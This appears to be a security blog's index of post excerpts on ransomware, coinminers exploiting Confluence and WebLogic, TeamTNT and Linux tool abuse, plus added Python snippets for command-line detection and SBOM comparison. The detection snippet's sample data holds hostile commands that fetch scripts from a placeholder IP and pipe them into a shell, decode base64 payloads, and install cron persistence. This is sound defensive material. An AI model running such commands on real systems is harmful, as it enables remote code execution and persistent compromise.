How Underground Groups Use Stolen Identities and Deepfakes

Such deepfake videos are already being used to cause problems for public figures. Celebrities, high-ranking government officials, well-known corporate figures, and other people with many high-resolution images and videos online are the easiest targets, and social engineering scams using their faces and voices are already proliferating. Given the tools and deepfake technology now available, we can expect even more attacks and scams aimed at manipulating victims through voice and…

Atlassian Confluence Vulnerability CVE-2022-26134 Abused For Cryptocurrency Mining, Other Malware

Users are advised to patch immediately: we found exploit samples abusing the Atlassian Confluence vulnerability (CVE-2022-26134) in the wild for malicious cryptocurrency mining. By: Sunil Bharti, September 21, 2022. We observed active exploitation of CVE-2022-26134, an unauthenticated remote code execution (RCE) vulnerability in the Atlassian Confluence collaboration tool with a critical CVSS rating of 9.8. The gap is…

Security Risks in Logistics APIs Used by E-Commerce Platforms

Our research examines the security flaws we found in the logistics API implementations of e-commerce platforms, flaws that can expose consumers' personal information. We discuss the security risks these flaws present for software engineers, e-commerce platform providers, and consumers. By: Ryan Flores, Charles Perine, Lord Alfred Remorin, Roel Reyes, September 20, 2022. The connectivity that we've experienced of late…

The Risk of Ransomware Supply Chain Attacks

Ransomware has been a major cybersecurity threat for years and dominates boardroom discussions. It is a type of malware that prevents or limits users from accessing their systems: malicious actors lock the system's screen or the user's files until a hefty ransom is paid. First seen in Russia between 2005 and 2006, ransomware's popularity as a business model spread across the globe, and by 2012 Trend Micro had observed a continuous spread of infections across Europe…

A Post-exploitation Look at Coinminers Abusing WebLogic Vulnerabilities

Using Workload Security to detect WebLogic vulnerability exploitation: Workload Security's correlation of telemetry and detections provided the initial security context in this campaign, which allowed security teams and analysts to track and monitor the malicious actor's activities. The following Workload Security modules detected the exploitation of CVE-2020-14882 on vulnerable systems. Intrusion prevention system module: Workload Security's intrusion prevention system module can tap into incoming traffic and effectively detect and block malicious network traffic…

Security Breaks: TeamTNT’s DockerHub Credentials Leak

We constantly deploy and study honeypots to get a view of actively exploited vulnerabilities and misconfigurations on platforms and services that pose cloud security risks. One of these honeypots is based on an exposed Docker REST API, for analysis from the perspectives of both cloud service providers and users. Upon analyzing the samples, we were able to understand the threat actors' use of container registry features for Docker malware and their tactics, techniques, and procedures (TTPs). Our…

How Malicious Actors Abuse Native Linux Tools in Their Attacks

Based on real-world attacks and our honeypots, we observed that malicious actors abuse a variety of tools that come bundled with Linux distributions, such as curl, wget, chmod, chattr, ssh, base64, chroot, crontab, ps, and pkill, for nefarious purposes. The presence of these utilities, especially inside container environments, should at least be considered, since they provide additional avenues…
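As an added illustration, not code from the original post, the following Python sketch shows what a command-line rule set for these bundled utilities can look like. It runs over a handful of constructed process-creation records (the sample command lines and IP addresses are made up, and the rule names are labels chosen for this example), flags the download-and-run, decode-and-run, staging, immutability and cron-persistence patterns, and decodes base64-wrapped payloads so that the hidden command is scanned with the same rules.

```python
import base64
import re

# Constructed sample process-creation records (not from the original post):
# the full command line a container or host sensor would record per exec.
SAMPLE_COMMANDS = [
    "curl -fsSL http://198.51.100.7/x.sh | sh",
    "wget -q -O /tmp/.k http://198.51.100.7/k && chmod +x /tmp/.k && /tmp/.k",
    "echo Y3VybCBodHRwOi8vMTk4LjUxLjEwMC43L2ggfCBiYXNo | base64 -d | bash",
    "chattr +i /etc/ld.so.preload",
    "(crontab -l; echo '* * * * * curl http://198.51.100.7/c | sh') | crontab -",
    "ps aux",
    "curl -s https://example.com/health",
]

# Each rule is an illustrative name plus a regex over the whole command line.
# The names are labels chosen for this example, not a vendor's signature IDs.
RULES = [
    # curl/wget output piped straight into a shell (no pipe in between)
    ("download_and_pipe_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|dash)\b")),
    # base64 -d output piped straight into a shell
    ("base64_decode_to_shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(sh|bash|dash)\b")),
    # chmod making a file under a world-writable staging directory executable
    ("stage_in_temp_and_mark_exec",
     re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\s+(/tmp|/var/tmp|/dev/shm)/")),
    # chattr +i: pin a file so cleanup and package upgrades cannot touch it
    ("chattr_immutable", re.compile(r"\bchattr\s+\+i\b")),
    # crontab read from stdin at the end of a pipeline: cron persistence
    ("crontab_install_from_stdin", re.compile(r"\|\s*crontab\s+-\s*$")),
]

# The common `echo <b64> | base64 -d` idiom; the encoded blob is captured so
# the decoded payload can be scanned with the same rules.
ENCODED_PAYLOAD = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\b")


def classify(cmd: str) -> list[str]:
    """Return the names of every rule the command line trips, in rule order.
    A base64-wrapped payload is decoded and re-scanned; hits from the decoded
    text are prefixed with 'decoded:'."""
    hits = [name for name, rx in RULES if rx.search(cmd)]
    m = ENCODED_PAYLOAD.search(cmd)
    if m:
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError
            inner = ""
        hits += ["decoded:" + name for name, rx in RULES if rx.search(inner)]
    return hits


def scan(commands) -> dict[str, list[str]]:
    """Map each suspicious command line to its rule hits; benign lines are omitted."""
    return {cmd: hits for cmd in commands if (hits := classify(cmd))}


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_COMMANDS).items():
        print(f"{', '.join(hits):55s} {cmd}")
```

The benign `ps aux` and the health-check `curl` produce no hits, which is the point of keying rules on the pattern of use (pipe into a shell, write into a staging directory, pin a file) rather than on the bare presence of the binary.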

Enhancing Cloud Security by Reducing Container Images Through Distroless Techniques

Figure 1 shows that there are 96 packages installed in this image. We can also use Grype, another increasingly popular tool, to analyze the SBOM generated by Syft and scan the original image for vulnerabilities. The risk of using Debian-based images is plain to see: the more packages there are, the larger the attack surface becomes. It also means a bigger disk and bandwidth footprint, which has pushed many developers…
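The package-count comparison can be made concrete. The following Python snippet, added here and not taken from the original article, diffs two constructed SBOMs in the shape of Syft's native JSON (an `artifacts` list with a name, version and type per package; the package sets and version strings are made up for the example) and reports which packages a distroless base drops, grouping the removed ones by the kind of tool an intruder would lean on, and flagging any version drift in the packages both images keep.

```python
import json

# Two constructed SBOMs (not from the original article) in the shape of Syft's
# native JSON output. Real Syft output carries many more fields per artifact;
# only name and version are read here. Versions are illustrative.
FULL_IMAGE_SBOM = json.dumps({"artifacts": [
    {"name": "apt",        "version": "2.2.4",              "type": "deb"},
    {"name": "bash",       "version": "5.1-2+deb11u1",      "type": "deb"},
    {"name": "base-files", "version": "11.1+deb11u5",       "type": "deb"},
    {"name": "coreutils",  "version": "8.32-4",             "type": "deb"},
    {"name": "curl",       "version": "7.74.0-1.3+deb11u3", "type": "deb"},
    {"name": "dpkg",       "version": "1.20.12",            "type": "deb"},
    {"name": "libc6",      "version": "2.31-13+deb11u5",    "type": "deb"},
    {"name": "libcurl4",   "version": "7.74.0-1.3+deb11u3", "type": "deb"},
    {"name": "libssl1.1",  "version": "1.1.1n-0+deb11u3",   "type": "deb"},
    {"name": "perl-base",  "version": "5.32.1-4+deb11u2",   "type": "deb"},
    {"name": "tzdata",     "version": "2021a-1+deb11u5",    "type": "deb"},
]})
DISTROLESS_SBOM = json.dumps({"artifacts": [
    {"name": "base-files", "version": "11.1+deb11u5",       "type": "deb"},
    {"name": "libc6",      "version": "2.31-13+deb11u5",    "type": "deb"},
    {"name": "libssl1.1",  "version": "1.1.1n-0+deb11u3",   "type": "deb"},
    {"name": "tzdata",     "version": "2021a-1+deb11u5",    "type": "deb"},
]})

# Packages whose binaries an intruder typically relies on once inside a
# container. Grouping removed packages this way shows what a distroless base
# takes away from an attacker, not only how many packages it drops.
LOLBIN_PACKAGES = {
    "shells": {"bash", "dash"},
    "downloaders": {"curl", "wget"},
    "package managers": {"apt", "dpkg"},
    "interpreters": {"perl-base", "python3"},
}


def packages(sbom_json: str) -> dict[str, str]:
    """Map package name -> version from a Syft-style SBOM document."""
    doc = json.loads(sbom_json)
    return {a["name"]: a["version"] for a in doc.get("artifacts", [])}


def surface_reduction(full_sbom: str, slim_sbom: str) -> dict:
    """Compare a full image's SBOM with its distroless counterpart."""
    full, slim = packages(full_sbom), packages(slim_sbom)
    removed = sorted(set(full) - set(slim))
    added = sorted(set(slim) - set(full))
    # Packages present in both still need vulnerability scanning (e.g. Grype
    # over the SBOM); a version mismatch between the images is worth a look.
    drifted = sorted(n for n in set(full) & set(slim) if full[n] != slim[n])
    lolbins_removed = {
        cls: sorted(set(removed) & names)
        for cls, names in LOLBIN_PACKAGES.items() if set(removed) & names
    }
    return {
        "full_count": len(full),
        "slim_count": len(slim),
        "removed": removed,
        "added": added,
        "version_drift": drifted,
        "lolbins_removed": lolbins_removed,
    }


if __name__ == "__main__":
    print(json.dumps(surface_reduction(FULL_IMAGE_SBOM, DISTROLESS_SBOM), indent=2))
```

On real images the counts are far larger than this toy pair, but the shape of the result is the same: the distroless image keeps the shared libraries the application links against and sheds the shells, downloaders and package managers that make a foothold useful to an attacker.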

Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa

Initial Access: Play's ransomware actors commonly gain initial access through valid accounts that were reused across multiple platforms, previously exposed, or obtained illegally. This includes Virtual Private Network (VPN) accounts, not just domain and local accounts. Exposed RDP servers are also abused to establish a foothold. Play ransomware also exploits the FortiOS vulnerabilities CVE-2018-13379 and CVE-2020-12812. CVE-2018-13379 is a path traversal vulnerability in the…

BumbleBee a New Modular Backdoor Evolved From BookWorm

In March 2021, we investigated a backdoor with a unique modular architecture and called it BumbleBee, after a string embedded in the malware. In our recent investigations, however, we discovered a controller application that expands its capabilities. By: Vickie Su, Ted Lee, Nick Dai, September 02, 2022.
